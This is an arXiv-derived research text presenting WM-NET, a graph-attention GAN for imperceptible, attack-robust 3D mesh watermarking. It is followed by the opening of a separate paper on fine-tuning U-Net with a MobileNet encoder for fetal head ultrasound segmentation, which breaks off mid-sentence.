http://arxiv.org/abs/2307.11628v2
# WM-NET: Robust Deep 3D Watermarking with Limited Data ###### Abstract The goal of 3D mesh watermarking is to embed the message in 3D meshes that can withstand various attacks imperceptibly and reconstruct the message accurately from watermarked meshes. Traditional methods are less robust against attacks. Recent DNN-based methods either introduce excessive distortions or fail to embed the watermark without the help of texture information. However, embedding the watermark in textures is insecure because replacing the texture image can completely remove the watermark. In this paper, we propose a robust deep 3D mesh watermarking WM-NET, which leverages attention-based convolutions in watermarking tasks to embed binary messages in vertex distributions without texture assistance. Furthermore, our WM-NET exploits the property that simplified meshes inherit similar relations from the original ones, where the relation is the offset vector directed from one vertex to its neighbor. By doing so, our method can be trained on simplified meshes(limited data) but remains effective on large-sized meshes (size adaptable) and unseen categories of meshes (geometry adaptable). Extensive experiments demonstrate our method brings 50% fewer distortions and 10% higher bit accuracy compared to previous work. Our watermark WM-NET is robust against various mesh attacks, e.g. Gauss, rotation, translation, scaling, and cropping. ## 1 Introduction Digital watermarking is a technology used in copyright protection of multimedia, such as images, videos, point clouds, and meshes. The goal of digital watermarking is to obtain watermarked media by embedding messages in the media in the embedding phase and reconstructing the message from the watermarked media in the reconstruction phase. The watermark should be _imperceptible_ and _robust_ so that it can withstand attacks and be _efficient_ for fast and size-agnostic copyright protection. Previous 3D mesh watermarking methods can be classified into DNN-based and non-DNN-based methods. Non-DNN-based methods embedded messages in either spectral domain [28, 27, 26, 44, 40, 1] or spatial domain [55, 17]. The complexity of frequency domain-based methods grows cubically with the mesh size because they rely on matrix eigenvalue decomposition. Spatial domain methods such as least-bit encoding are less robust to mesh attacks such as Gaussian attacks. Recent DNN-based methods showed the possibility of embedding messages in vertex distributions [47] and texture distributions [54]. However, [54] can Figure 1: **Top**: we train our WM–NET on simplified meshes to simulate limited data scenarios. **Bottom**: WM–NET shows adaptation on varied mesh sizes and unseen geometry. Figure 2: Comparison between ours and previous. only verify the watermark with the help of texture. The attacker can easily remove the watermark by replacing the texture image. Although [47] embedded messages in vertex distributions and reduced artifacts caused by watermarking with the introduction of an additional curvature penalty during training, their watermarked meshes were still perceptually different from the original ones. Moreover, watermark quality and embedding overhead should be less impacted by variations in mesh sizes and geometries. Overall, no previous work explored a robust and adaptive watermarking method under multiple variations. In this paper, we propose a robust deep 3D watermarking WM-NET, a generative adversarial network (GAN) based watermarking architecture that can invisibly embed binary messages in vertex distributions and later reconstruct messages from watermarked meshes. Furthermore, our method is adaptable to different sizes of meshes and can be extended to unseen geometries. We explore watermarking in vertex distributions of meshes in an _imperceptible_, _robust_, and _adaptable_ way. There are two challenges in the following. **The first challenge** is how to conceal a binary message in vertex distributions without causing visible distortions. **The second challenge** is how to ensure that the watermarking method is adaptable to unseen geometries and remains efficient and effective even with an increased mesh size. We tackle these challenges based on two insights. The first insight is that convolutions on images and meshes are similar. Thus the success of image watermarking [57] can be transferred to mesh watermarking by using graph-attention network (GAT) [46]. The second insight is that different sizes of meshes under the same categories share similar features. By exploiting such similarities, we can train our WM-NET with simplified meshes(limited data) and keep effective on meshes with increased sizes. Our extensive experiments demonstrate that attention-based convolution can be also generalized to unseen geometries. Specifically, our adopted GAT is the backbone of our WM-NET, which can generate watermarked meshes given the original meshes and binary messages, and reconstruct the binary messages from the watermarked meshes. Our WM-NET consists of 1) an encoder, 2) a decoder, 3) a message autoencoder, 4) an attack layer, and 5) a discriminator, as shown in Fig. 5. We train our WM-NET using limited data from the train set under all scenarios to better evaluate the adaptation. To prove effectiveness, our WM-NET is tested on full test data. To prove both geometry and size adaptation, we test WM-NET on various datasets and different sizes of meshes. We also measure its capacity by inserting various lengths of binary messages. In summary, our key contributions are the following: * We propose a robust deep 3D watermarking WM-NET, a generative adversarial network (GAN) based watermarking architecture, which embeds binary messages in vertex distributions without the texture assistance by incorporating the graph attention network (GAT). * We exploit the property that simplified meshes inherit similar relations from the original meshes, where the relation is an offset vector directed from a vertex to its neighbor. Our WM-NET can be trained on simplified meshes(limited data) but remains effective on large-sized meshes (size adaptable) and unseen categories of meshes (geometry adaptable). * We conduct extensive experiments on various datasets to prove WM-NET's effectiveness and adaptation. Our WM-NET has 50% fewer distortions and 10% higher bit accuracy than previous methods which embed in vertex distributions and achieves similar distortions and accuracy with texture-based methods. We highlight that watermarking in vertex distributions is more secure and harder than watermarking in texture. ## 2 Related Work ### Watermarking The application of deep neural networks (DNNs) over 3D mesh watermarking tasks is far from exploration. Early 3D mesh watermarking methods [28, 27, 26, 44, 40, 1] used Fourier and wavelet analysis to transfer meshes into the frequency domain and embed watermark bits into Fourier/wavelet coefficients. But the time complexity of these methods grows cubically with the number of vertices. [55, 17] proposed to embed watermarks into the least significant bits of vertex coordinates to minimize the distortion. [15] leveraged the layering artifacts of 3D printed meshes to apply watermarking embedding and reconstruction. Recently, [54] and [47] explored the feasibility of DNN in watermarking work. [47] stacked graph residual blocks to embed and extract the watermark. [54] embedded secret \begin{table} \begin{tabular}{c|c|c|c|c} Approach & Message Reconstruction & Imperceptibility & Robustness & Size Adaptation & Geometry Adaptation \\ \hline Yoo. _et al_. [54] & ✔ & ✔ & ✔ & ✘ & ✘ \\ Wang. _et al_. [47] & ✔ & ✘ & ✔ & ✘ & ✘ \\ WM-NET (ours) & ✔ & ✔ & ✔ & ✔ & ✔ \\ \hline \hline \end{tabular} \end{table} Table 1: Overview of the advantages. ✔indicates satisfying the corresponding feature and ✘indicates not. messages in textures of meshes and then extracted the message from the rendered 2D image, but cannot reconstruct an accurate message without the help of a texture encoder. Recently, [7] researched how to detect DNN-generated images. ### Neural Networks for 3D Meshes Existing methods for 3D data built features from faces [52, 9, 21, 13, 16, 19], edges [39, 46, 49] and vertices [29, 30, 50, 24, 53, 12, 11]. The built features were applied to downstream tasks such as classification and segmentation. [46, 39] introduced an attention-based mechanism into graph convolution, where the weights of each neighbor were adjusted based on the edge information. Such graph-based convolution can be further extended to 3D meshes. A series of research of mesh autoencoders [41, 56, 36] were proposed for mesh reconstruction and mesh denoising. ### Domain Adaptation Although extensive work has been proposed to perform unsupervised domain adaptation (UDA) on images and point clouds, UDA on autoencoders of 3D meshes was rarely explored. In 2D images, [10, 18, 25, 33, 34, 43] aimed to reduce the difference between two domain distributions in the feature space, and [2, 14, 38] learned the translation from the source domain to target domain. In 3D point cloud, [31] addressed the domain shift problem for shape classification. [37] provided adaptability by learning geometry-aware implicit. [20] proposed data augmentation to improve the generalization of 3D mesh detectors. [48] noticed that the domain variance was caused by vehicle sizes and bridged the gaps between domains. ## 3 Definition Triangle meshes can be viewed as undirected graphs \(G(V,E)\). Vertices \(V\in\mathbb{R}^{N_{v}\times C_{v}}\) contains \(N_{v}\) vertices, and each vertex has \(C_{v}\) vertex elements such as coordinates and normals. Edges \(E\) can be transformed from faces set of triangle meshes, where each face is a triangle formed by three vertex indices. Since changes of \(E\) produce unexpected artifacts, we embed a binary message \(M\in\{0,1\}^{N_{m}}\) into the vertex distribution \(V\), i.e., we embed binary messages in vertex distributions \(V\). Let \(V,\hat{V},M,\hat{M}\) denote the original vertex, watermarked vertex, binary messages, and reconstructed messages, respectively. We model the problem by the following equations: \[\begin{split}\hat{V}&=\mathcal{E}_{\phi}(V,M)\\ \hat{M}&=\mathcal{D}_{\theta}(\hat{V})\end{split} \tag{1}\] In Eq 1, a parameterized encoding function \(\mathcal{E}_{\phi}\) generates watermarked vertices \(\hat{V}\) given original vertices \(V\) and a binary message \(M\). A parameterized decoding function \(\mathcal{D}_{\theta}\) reconstructs \(\hat{M}\) from \(\hat{V}\). The encoding function should minimize the perturbation between \(V\) and \(\hat{V}\) by minimizing the following loss to achieve imperceptible embedding: \[L_{enc}(\phi,\theta)=\mathbb{E}_{V,M}[\|\hat{V}-V\|_{2}^{2}] \tag{2}\] To achieve precise reconstruction, we try to minimize the following loss: \[L_{dec}(\phi,\theta)=\mathbb{E}_{V,M}[\|\hat{M}-M\|_{2}^{2}] \tag{3}\] Finally, we have combined the optimization problem: \[\phi^{*},\theta^{*}=\operatorname*{arg\,min}_{\phi,\theta}(L_{enc}(\phi, \theta)+L_{dec}(\phi,\theta)) \tag{4}\] ## 4 Method We propose WM-NET, an end-to-end generation network for imperceptible watermarking that can be robust to arbitrary attacks and be adaptive with different mesh sizes and geometry. To watermark a graph signal \(G(V,E)\), we naturally consider spectral-based graph convolution [6] to perform watermarking tasks. However, spectral-based methods focus on the global feature because they rely on the Laplacian decomposition on the entire graph, which makes them less robust to cropping attacks and less efficient to large graphs. We utilize local features in the spatial domain using graph attention network (GAT) in Section 4.1, which is the backbone of our WM-NET. Section 4.2 introduces all WM-NET modules, followed by a detailed introduction to our training details. ### Graph Attention Network on Mesh Graph attention network (GAT) is a convolution operator defined on graphs. For \(l\)-th layer of GAT, the input is a set of vertex features \(\mathbf{F}^{l}=\{F_{v_{0}}^{l},F_{v_{2}}^{l},...,F_{v_{N}}^{l}\}\), where \(N\) is the number of vertices. This layer produces a new set of vertex features \(\mathbf{F}^{l+1}=\{F_{v_{0}}^{l+1},F_{v_{2}}^{l+1},...,F_{v_{N}}^{l+1}\}\). For each vertex \(v_{i}\), its new feature \(F_{v_{i}}^{l+1}\) is computed as the averaged weighted sum of its neighbor features \(F_{v_{j}}^{l}\) for all \(v_{j}\in\mathcal{N}(v_{i})\). To increase expressive power, weights for each neighbor \(v_{j}\) are obtained from learnable linear transform \(W_{\Theta}\). In Section 3, we view 3D meshes as graphs \(G(V,E)\). We first define our GAT on meshes as: \[F_{v_{i}}^{l+1}=\frac{1}{|\mathcal{N}(v_{i})|}\sum_{v_{j}\in\mathcal{N}(v_{i} )}F_{v_{j}}^{l}W_{\Theta}(D(v_{j},v_{i})) \tag{5}\] where \(F^{l+1}(v_{i})\) is the feature vector of \(v_{i}\) at \((l+1)\)-th layer. The neighborhood \(\mathcal{N}(v_{i})=\{v_{j},(v_{j},v_{i})\in E\}\cup\{v_{i}\}\) is defined as all points adjacent to the point \(v_{i}\) and itself. We use a multilayer perceptron (MLP) to model the learnable linear transform \(W_{\Theta}\). The input of the MLP is the relation \(D(v_{i},v_{j})\) between the target vertex \(v_{i}\) and its neighbor \(v_{j}\). Figure 3 gives a visualization process of our GAT. We show that it is beneficial to learn from relation \(D(v_{i},v_{j})\). We define relation \(D(v_{i},v_{j})=\vec{v_{i}}-\vec{v_{j}}\) as the coordinate offset from \(v_{i}\) to \(v_{j}\). Such the relation can survive the mesh simplification algorithm [22, 23]. First, we simplify meshes to reduce the vertex number to \(1/5\) of the original, _i.e_. \(N_{v}^{\prime}=1/5N_{v}\). Then we visualize the coordinates and relation distributions for both original and simplified meshes in Figure 4. Figure 4 shows coordinate distribution differences between original and simplified meshes, while relation distributions are still included in the original distributions. Based on this insight, our method is trained on simplified meshes and show adaptation to increased-size meshes. ### Wm-Net Our WM-NET is a GAN-based network (Figure 5) to achieve objectives in Eq.(4). Our architecture consists of five parameterized learnable components: 1) a message autoencoder that can map a binary message \(M\) to a latent code \(z\) and decode \(z\) back to \(M\), 2) an encoder \(\mathbf{E}\) models function \(\mathcal{E}_{\phi}\) that generates a watermarked vertices \(\hat{V}\) given \(V\) and \(z\), 3) an attack layer applies perturbation over \(\hat{V}\) to increase the robustness in the way of data augmentation, 4) a decoder \(\mathbf{D}\) models \(\mathcal{D}_{\theta}\) that reconstructs binary message from \(\hat{v}\), and 5) a discriminator \(\mathbf{A}\) encourages \(\hat{V}\) indistinguishable from \(V\). The **encoder**\(\mathbf{E}\) first applies convolutions to input \(V\) to form some intermediate representation. We aim to incorporate message latent code \(z\) in the way that the encoder learns to embed parts of it at any spatial location of \(V\). To achieve this, we replicate the latent code and concatenate it to the intermediate representations. We apply more convolutions to transform the concatenated feature to watermarked vertices \(\hat{V}\). The **attack layer** applies perturbations to generated \(\hat{V}\). The perturbations consider several mesh attacks, including 1) cropping attack with cropping ratio \(c\), 2) Gaussian noise with mean \(\mu\) and deviation \(\sigma\), 3) random rotation attacks with rotate center \((x,y,z)\) and degree \(\alpha\), 4) translation attack and 5) scaling attack with a scaling ratio \(s\). Our ablation study shows that the attack layer effectively increases the robustness against multiple attacks. The **decoder**\(\mathbf{D}\) first applies several convolutions to generate the intermediate representation of \(\hat{V}\). It finally uses a global average pooling followed by an MLP layer to generate a vector of the same size as the latent code \(z\). The global average pooling layer ensures that our method aggregates information from all vertices. The **adversarial discriminator \(\mathbf{A}\)** shares a similar structure as the decoder except that its final MLP layer transforms the aggregated vector into a binary classification, which indicates whether the given \(\hat{V}\) is generated by the encoder \(\mathbf{E}\). According to Shannon's capacity theory [35], redundancy is necessary to achieve robustness. The **message autoencoder** increases the robustness of our system by injecting redundancy into the system. Given a binary message \(M\) of length \(N_{m}\), the message encoder maps it into a latent code \(z\) of length \(N_{z}>N_{m}\), which can be used to recover Figure 4: t-SNE [45] visualization of the distribution between original and simplified meshes. (a) shows the existence of distribution shifts between the original and decimated coordinates. However, (b) shows that the distributions of decimated relations \(D(v_{i},v_{j})\) are included in the distributions of the original ones. \(M\) through a message decoder. We train the autoencoder in a way that the decoder can recover \(M\) from the noised latent code \(\hat{z}\). We choose NECST [4], a learnable channel coding method, as our message autoencoder. Our message autoencoder is trained independently from the entire watermarking model. ### Training and Losses We achieve the objective in Eq 4 using three losses: encoding loss \(L_{enc}\), reconstruction loss \(L_{dec}\), and discriminative loss \(L_{dis}\). Formally: \[\begin{split}\phi^{*},\theta^{*}=\\ \operatorname*{arg\,min}_{\phi,\theta}&(\lambda_{ enc}L_{enc}(\phi,\theta)+\lambda_{dec}L_{dec}(\phi,\theta)+\lambda_{dis}L_{dis}( \phi,\theta))\end{split} \tag{6}\] where \(\lambda_{enc},\lambda_{dec},\lambda_{dis}\) are weight factors. Both \(L_{enc},L_{dis}\) encourage generated \(\hat{V}\) indistinguishable from \(V\). For \(L_{enc}\), we use both the L2 norm and infinite norm of geometry difference to penalize the distortion: \[L_{enc}=\frac{1}{N_{v}}\sum_{i}^{N_{v}}(V[i]-\hat{V}[i])^{2}+\max_{i}\{V[i]- \hat{V}[i]\} \tag{7}\] For \(L_{dis}\), we use part of sigmoid cross entropy loss: \[L_{dis}=\log(1-\sigma(\mathbf{A}(\hat{V}))) \tag{8}\] We apply standard sigmoid cross entropy loss to encourage precise message reconstruction: \[\begin{split}& L_{dec}=\\ &\frac{\sum_{i}^{N_{m}}(M[i]\cdot\log\sigma(\hat{M}[i])+(1-M[i]) \cdot\log(1-\sigma(\hat{M}[i])))}{N_{m}}\end{split} \tag{9}\] The final message bits are computed from the following equation: \[M_{final}=clamp(sign(\hat{M}-0.5),0,1) \tag{10}\] ## 5 Experiment ### Setup **Network Configurations and Parameters.** Our WM-NET uses the convolution operator in Section 4.1 to build \(\mathbf{E}\), \(\mathbf{D}\) and \(\mathbf{A}\), where channel size are all 64. At the first layer, we take coordinates \((x,y,z)\) as the feature of points, i.e., \(C_{v}=3\). We trained our WM-NET under settings of different message lengths \(N_{m}=8,16,32,48\). During training, we set \(\lambda_{enc}=2,\lambda_{dec}=1,\lambda_{dis}=0.001\) under the settings of 8-bit message lengths, and we set \(\mu=0\), \(\sigma=0.01\), \(\alpha\in[0,\pi)\), \(s\in[0.1,1)\). **Baselines.** We compare the existing DNN-based watermarking methods [54, 47]. [47] embeds the secret message in vertex distributions. [54] embeds the secret message in both vertex distributions and texture distributions but fails to verify the watermark without texture assistance. We compare [54] with its texture assistance and show that Figure 5: WM-NET overview. Message encoder first maps message \(M\) into latent code \(z\), which is further fed to the watermark encoder \(\mathbf{E}\) along with the input mesh \(G\) to generate the encoded mesh \(\hat{G}\). The attack layer generates a noised mesh \(G_{adv}\). Given the noised mesh, the watermark decoder \(\mathbf{D}\) produces the decoded latent code \(\hat{z}\) followed by the message decoder, which decodes latent code into decoded message \(\hat{M}\). The adversarial discriminator encourages minimizing the difference between \(G\) and \(\hat{G}\). our method achieves similar effectiveness without the texture assistance. **Metrics.** To evaluate the extracted message accuracy, we use average bit accuracy. To evaluate geometry distortion, we use Hausdorff distance and the L1 norm of vertex Normal (L1 Normal) to evaluate geometry difference. Hausdorff distance was commonly used in 3D reconstruction tasks and one of our baselines [47], and L1 Normal was used in [54]. ### Dataset Our WM-NET is trained on a limited train set from ModelNet40 [51] and then tested on the entire test of ModelNet40, and other datasets such as ShapeNet [3], GraspNet [8], ScanNet [5] and Hands [32]. For all datasets, we normalize the vertex coordinates \((x,y,z)\) to \([-1,1]\) while keeping the ratio between width, height, and depth before meshes are fed into the network. We acquire limited data through a simplification using CGAL [42], which performs edge-collapse or half-edge-collapse algorithms to reduce the number of triangles by merging vertices. We generated two train sets _m500_ and _m2500_. The number of vertices in _m500_ and _m2500_ are \(N_{v}=500\) and \(N_{v}=2500\), respectively. For _m2500_, we manually filter out meshes whose \(N_{v}\) is originally less than 2500 and those with low quality after simplifications. We also perform the same process for _m500_. As a result, we get 3508 train meshes and 879 test meshes for _m2500_, and 1147 train meshes and 337 test meshes for _m500_. The original ModelNet has 9843 and 2468 meshes for training and testing. We train two replicas of WM-NET on _m500_ and _m2500_, respectively. Both are further tested on the entire test set of ModelNet to evaluate the size adaptation. To evaluate geometry adaptation, two replicas of WM-NET, which is trained on _m500_ and _m2500_ are tested on ShapeNet, GraspNet, ScanNet, and Hands. ShapeNet has different categories of meshes from ModelNet, such as birdhouse, camera, clock, etc. Scannet is a dataset of scanned and reconstructed real-world scenes. Hands contain meshes of human hands. ### Effectiveness **Distortion vs. Accuracy.** Figure 6 shows the results of our watermark. Table 2 shows the trade-off relation between distortions and bit accuracy. We conduct experiments on varied \(\lambda_{enc},\lambda_{dec}\) when setting \(\lambda_{dis}=0.001\). Higher bit accuracy results in higher L1 geometry differences. **Robustness Under Attack.** We consider (1) Gaussian Noise, (2) Translation, (3) Rotation, (4) Scaling, and (5) Cropping Attacks. Table 3 shows the robustness of our method against arbitrary attacks. It is worth noting that we still achieve 65.81% bit accuracy under 90% cropping at Figure 6: Results to show the imperceptible watermarking: (a) visualization of L1 Norm of vertex normal distortions, (b) the original mesh, and (c) the watermarked mesh with WM-NET (ours) tacks. In such a case, we can still claim ownership our the cropped mesh. More details about the experiments are discussed in the supplementary material. **Comparison to Previous Work.** Embedding in vertex distributions is more secure because it is agnostic to changes in texture images. We compare our WM-NET with texture-based method [54], and 3D domain method [47]. In settings of 8-bit binary messages, our method achieves 10% higher bit accuracy while only introducing 50% fewer distortions. Note that watermarking without the assistance of texture is harder. However, our method still achieves similar distortions and accuracy compared with the texture-based method [54]. The adaptation is tested under the following settings. We train WM-NET on _m500_ and _m2500_ to get two replicas. Both are further evaluated on the original test set of ModelNet40, ShapeNet40, ScanNet, GraspNet, and Hands. The data distributions in ShapeNet40, ScanNet, GraspNet, and Hands are all unseen to both WM-NET replicas during training. Figure 8 shows the result using the WM-NET trained on _m2500_. The top row shows the cover meshes where (a-d) are simplified from the original mesh (e). The bottom row shows the watermarked meshes. Table 6 shows statistical results under size variations. We evaluate our method on meshes with \(N_{v}\leq 100000\). For the WM-NET trained on _m2500_, it is still effective when mesh size is 40\(\times\) increased. Comparing to the WM-NET trained on _m2500_, the one trained on _m500_ achieves lower accuracy and intro \begin{table} \begin{tabular}{c|c|c|c|c} \hline \hline \(N_{m}\) & Method & Hausdorff & L1 Normal & Acc \\ \hline \hline \multirow{3}{*}{8} & Yoo _et al._[54] & / & **0.1041** & 0.9362 \\ \cline{2-5} & Wang _et al._[47] & 0.1495 & 0.2277 & 0.8512 \\ \cline{2-5} & WM-NET & **0.0433** & 0.1143 & **0.9403** \\ \hline \multirow{3}{*}{16} & Yoo _et al._[54] & / & / & 0.8000 \\ \cline{2-5} & Wang _et al._[47] & 0.2770 & 0.5028 & 0.8041 \\ \cline{2-5} & WM-NET & **0.0765** & **0.2241** & **0.8772** \\ \hline \multirow{3}{*}{32} & Yoo _et al._[54] & / & / & 0.6441 \\ \cline{2-5} & Wang _et al._[47] & 0.2227 & 0.4016 & 0.5324 \\ \cline{1-1} \cline{2-5} & WM-NET & **0.0869** & **0.3504** & **0.7087** \\ \hline \multirow{3}{*}{48} & Yoo _et al._[54] & / & / & 0.5905 \\ \cline{1-1} \cline{2-5} & Wang _et al._[47] & 0.3149 & 0.6630 & 0.5960 \\ \cline{1-1} \cline{2-5} & WM-NET & **0.0654** & **0.3668** & **0.6321** \\ \hline \hline \end{tabular} \end{table} Table 4: Comparison to previous work. \begin{table} \begin{tabular}{c c|c|c|c} \hline \hline Parameters & \multicolumn{2}{c|}{Distortion} & \multirow{2}{*}{Acc} \\ \hline \(\lambda_{enc}\) & \(\lambda_{dec}\) & Hausdorff & L1 Normal & \\ \hline 1 & 2 & 0.0636 & 0.2379 & **0.9891** \\ 2 & 1 & 0.0505 & 0.1482 & 0.9659 \\ 3 & 1 & 0.1001 & 0.1142 & 0.9603 \\ 5 & 1 & 0.0433 & 0.1143 & 0.9403 \\ 10 & 1 & **0.0309** & **0.0666** & 0.7609 \\ \hline \hline \end{tabular} \end{table} Table 2: We fix \(\lambda_{dis}=0.001\) and vary \(\lambda_{enc}\)\(\lambda_{dec}\) to show a trade-off relationship between distortions and bit accuracy. Figure 7: t-SNE [45] visualization of latent feature. To show the geometry adaptation, we visualize latent features of 6 unseen categories of meshes. We label their latent feature with (a) the embedded message and (b) their categories. (a) shows that the meshes embedded with different messages are separated in latent space. (b) shows that the distributions of different categories are entangled once they are embedded with the same messages. duces more distortions. However, it still achieves 79.02% accuracy when the mesh size is 190\(\times\) increased. Table 6 shows results under geometry variations on ShapeNet. On ShapeNet, the WM-NET trained on _m2500_ achieves 93.48% bit accuracy on average while only introducing 0.1854 L1 distortions to vertex normal and 0.0549 Hausdorff distortions. The results demonstrate the statement in Section 4.1 that simplified meshes inherit the relation \(D(v_{i},v_{j})\) distribution from the original meshes. However, as the size of training meshes decreases, the adaptation of GAT decreases as well. ### Ablation Study We evaluate our WM-NET with the downsampling and upsampling process as in [56] and without the attack layer. Table 8 shows that our method is less robust to rotation attacks without the attack layer, and it is harmful to involve the upsampling and downsampling process in watermarking. We also measure secrecy by training an additional binary classifier to distinguish between the cover and watermark meshes. We use \(\mathbf{A}\) and a PointNet-based classifier to distinguish watermarked meshes from the original ones. Table 9 shows that both classifiers can finally make over 90% detection accuracy through overfitting on the train set but only have 50% detection accuracy over the validation set. This shows that training a binary classifier to distinguish watermarked meshes from cover meshes is not applicable. \begin{table} \begin{tabular}{c|c|c|c|c|c|c|c} \hline & Metrics & \((0,20000)\) & \([20000,40000)\) & \([40000,60000)\) & \([60000,80000)\) & \([80000,100000)\) \\ \hline \hline \multirow{3}{*}{_m500_} & Hausdorff & 0.1172 & 0.0972 & 0.0924 & 0.0921 & 0.0939 \\ & L1 Normal & 0.1851 & 0.2003 & 0.2214 & 0.2274 & 0.2452 \\ & Acc & 0.9386 & 0.8731 & 0.8482 & 0.8305 & 0.7902 \\ \hline \multirow{3}{*}{_m2500_} & Hausdorff & 0.0611 & 0.0544 & 0.0535 & 0.0529 & 0.0548 \\ & L1 Normal & 0.1989 & 0.1476 & 0.1599 & 0.1605 & 0.1647 \\ \cline{1-1} & Acc & 0.9462 & 0.9034 & 0.9183 & 0.9123 & 0.8708 \\ \hline \hline \end{tabular} \end{table} Table 6: Size adaptation on ModelNet dataset with the varied number of vertices \(N_{v}\in(0,100000]\). _m500_ and _m2500_ are trained on simplified ModelNet dataset with \(N_{v}=500\) and \(N_{v}=2500\), respectively. \begin{table} \begin{tabular}{c|c|c|c} \hline & Effectiveness & Adaptation & Rotation \\ \hline \hline original & **0.9814** & 0.9102 & **0.9684** \\ sampling & 0.6048 & 0.6053 & 0.5103 \\ w/o attack & 0.9781 & **0.9213** & 0.5612 \\ \hline \hline \end{tabular} \end{table} Table 8: WM-NET ablation study. We report bit accuracy for models trained with original settings (original), downsample-upsample (sampling), and without the attack layer (w/o attack). \begin{table} \begin{tabular}{c|c|c c c c c c c c c} \hline & Metrics & Avg & birdhouse & camera & clock & spigot & knife & loudspeaker & mug & pistol & printer \\ \hline \hline \multirow{3}{*}{_m500_} & Hausdorff & 0.0958 & 0.0978 & 0.0923 & 0.1054 & 0.0862 & 0.0547 & 0.1060 & 0.0982 & 0.0809 & 0.0994 \\ & L1 Normal & 0.1808 & 0.1649 & 0.1439 & 0.1576 & 0.1464 & 0.1355 & 0.1521 & 0.1213 & 0.1580 & 0.2033 \\ & Acc & 0.8863 & 0.8698 & 0.9347 & 0.9220 & 0.7943 & 0.7160 & 0.9221 & 0.8615 & 0.8969 & 0.9390 \\ \hline \multirow{3}{*}{_m2500_} & Hausdorff & 0.0549 & 0.0680 & 0.0568 & 0.0570 & 0.0474 & 0.0493 & 0.0620 & 0.0527 & 0.0562 & 0.0547 \\ & L1 Normal & 0.1854 & 0.2091 & 0.1599 & 0.1608 & 0.1479 & 0.1722 & 0.1758 & 0.1266 & 0.1767 & 0.1800 \\ \cline{1-1} & Acc & 0.9348 & 0.9554 & 0.9800 & 0.9489 & 0.9358 & 0.8773 & 0.9682 & 0.9526 & 0.9324 & 0.9623 \\ \hline \hline \end{tabular} \end{table} Table 5: Geometry adaptation on ShapeNet dataset. _m500_ and _m2500_ are trained on simplified ModelNet dataset with \(N_{v}=500\) and \(N_{v}=2500\), respectively. \begin{table} \begin{tabular}{c|c|c|c} \hline & Effectiveness & Adaptation & Rotation \\ \hline \hline original & **0.9814** & 0.9102 & **0.9684** \\ sampling & 0.6048 & 0.6053 & 0.5103 \\ w/o attack & 0.9781 & **0.9213** & 0.5612 \\ \hline \hline \end{tabular} \end{table} Table 9: The detection rate when distinguishing \(G\) and \(\hat{G}\). ## 6 Conclusion 3D watermarking is a key step toward copyright protection. Our paper has introduced WM-NET, which utilizes graph attention networks to embed binary messages in vertex distributions without texture assistance. Our approach has taken advantage of the property that simplified meshes inherit similar relations from the original ones, specifically the offset vector between adjacent vertices. This approach has enabled the training on simplified meshes but remains effective on larger and previously unseen categories of meshes (size and geometry adaptation), resulting in 50% fewer distortions and 10% higher bit accuracy than previous methods. Moreover, extensive experiments have shown that our WM-NET is robust against various mesh attacks, such as Gauss, rotation, translation, scaling, and cropping.
2307.09067
Evaluate Fine-tuning Strategies for Fetal Head Ultrasound Image Segmentation with U-Net
Fetal head segmentation is a crucial step in measuring the fetal head circumference (HC) during gestation, an important biometric in obstetrics for monitoring fetal growth. However, manual biometry generation is time-consuming and results in inconsistent accuracy. To address this issue, convolutional neural network (CNN) models have been utilized to improve the efficiency of medical biometry. But training a CNN network from scratch is a challenging task, we proposed a Transfer Learning (TL) method. Our approach involves fine-tuning (FT) a U-Net network with a lightweight MobileNet as the encoder to perform segmentation on a set of fetal head ultrasound (US) images with limited effort. This method addresses the challenges associated with training a CNN network from scratch. It suggests that our proposed FT strategy yields segmentation performance that is comparable when trained with a reduced number of parameters by 85.8%. And our proposed FT strategy outperforms other strategies with smaller trainable parameter sizes below 4.4 million. Thus, we contend that it can serve as a dependable FT approach for reducing the size of models in medical image analysis. Our key findings highlight the importance of the balance between model performance and size in developing Artificial Intelligence (AI) applications by TL methods. Code is available at https://github.com/13204942/FT_Methods_for_Fetal_Head_Segmentation.
Fangyijie Wang, Guénolé Silvestre, Kathleen M. Curran
2023-07-18T08:37:58Z
http://arxiv.org/abs/2307.09067v2
# Evaluate Fine-tuning Strategies for Fetal Head Ultrasound Image Segmentation with U-Net ###### Abstract Fetal head segmentation is a crucial step in measuring the fetal head circumference (HC) during gestation, an important biometric in obstetrics for monitoring fetal growth. However, manual biometry generation is time-consuming and results in inconsistent accuracy. To address this issue, convolutional neural network (CNN) models have been utilized to improve the efficiency of medical biometry. But training a CNN network from scratch is a challenging task, we proposed a Transfer Learning (TL) method. Our approach involves fine-tuning (FT) a U-Net network with a lightweight MobileNet as the encoder to perform segmentation on a set of fetal head ultrasound (US) images with limited effort. This method addresses the challenges associated with training a CNN network from scratch. It suggests that our proposed FT strategy yields segmentation performance that is comparable when trained with a reduced number of parameters by 85.8%. And our proposed FT strategy outperforms other strategies with smaller trainable parameter sizes below 4.4 million. Thus, we contend that it can serve as a dependable FT approach for reducing the size of models in medical image analysis. Our key findings highlight the importance of the balance between model performance and size in developing Artificial Intelligence (AI) applications by TL methods. Code is available at [https://github.com/13204942/FT_Methods_for_Fetal_Head_Segmentation](https://github.com/13204942/FT_Methods_for_Fetal_Head_Segmentation). **Keywords:** Medical Imaging, Transfer Learning, Ultrasound, Biometry, Convolutional Neural Network. ## 1 Introduction Training a deep CNN from scratch can prove to be a formidable undertaking, particularly in medical applications that are often constrained by limited annotated data and require a substantial time investment. However, Transfer Learning (TL) can help alleviate these challenges. TL is a technique in which a network learns from a large dataset and then applies that knowledge to another application, typically a smaller dataset. This approach can be especially advantageous in medical applications where annotated data is scarce, as it permits the utilization of pre-trained models to enhance performance on smaller datasets. TL approaches entail the adoption of pre-trained models and fine tuning (FT). In this study, we conducted a segmentation task on fetal head US images using deep neural networks with various FT strategies. The dataset HC18 comprises of 1334 ultrasound images obtained from 551 pregnant women and is publicly available [22]. To perform semantic segmentation on the HC18 fetal head US images, we performed the FT of the U-Net [14] network, with a pre-trained MobileNet [15] as its backbone. In order to develop a lightweight model using FT techniques, this research work considered a comparison of model sizes for various pre-trained CNN models. Furthermore, we investigated the impact of FT on different decoder layers for fetal head segmentation. In terms of segmentation outcomes on tests, the results were competitive in comparison to the state-of-the-art (SOTA) results, 97% (\(\pm\) 0.3%) achieved by [1] with FT the encoder. Our research is of significance when analyzing the trade-off between performance and model size in the development of mobile AI applications. The main contributions of this paper are as follows: (1) We analyzed eight different fine-tuning strategies on a U-Net network that used a MobileNet V2 encoder to predict segmentation masks from a fetal head ultrasound dataset. (2) We achieved SOTA accuracy on the HC18 Grand Challenge by providing a pre-trained U-Net model that had only 4.4 million trainable parameters. (3) Our experiments showed that unfreezing the decoder of a pre-trained 